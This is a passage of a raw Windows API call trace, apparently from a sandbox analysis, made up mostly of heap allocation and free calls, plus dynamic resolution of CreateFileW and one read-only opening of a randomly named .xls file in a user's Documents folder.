Size=0x8) returned 0x43e2ab0 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0080.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0080.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0080.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0080.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4260 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.847] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.850] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb240 [0080.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb240, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0080.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.851] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.851] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\e_f7p3czo1cdd9o.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0080.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0080.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0080.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0080.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0080.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0080.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.854] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.855] HeapFree (in: hHeap=0x1780000, 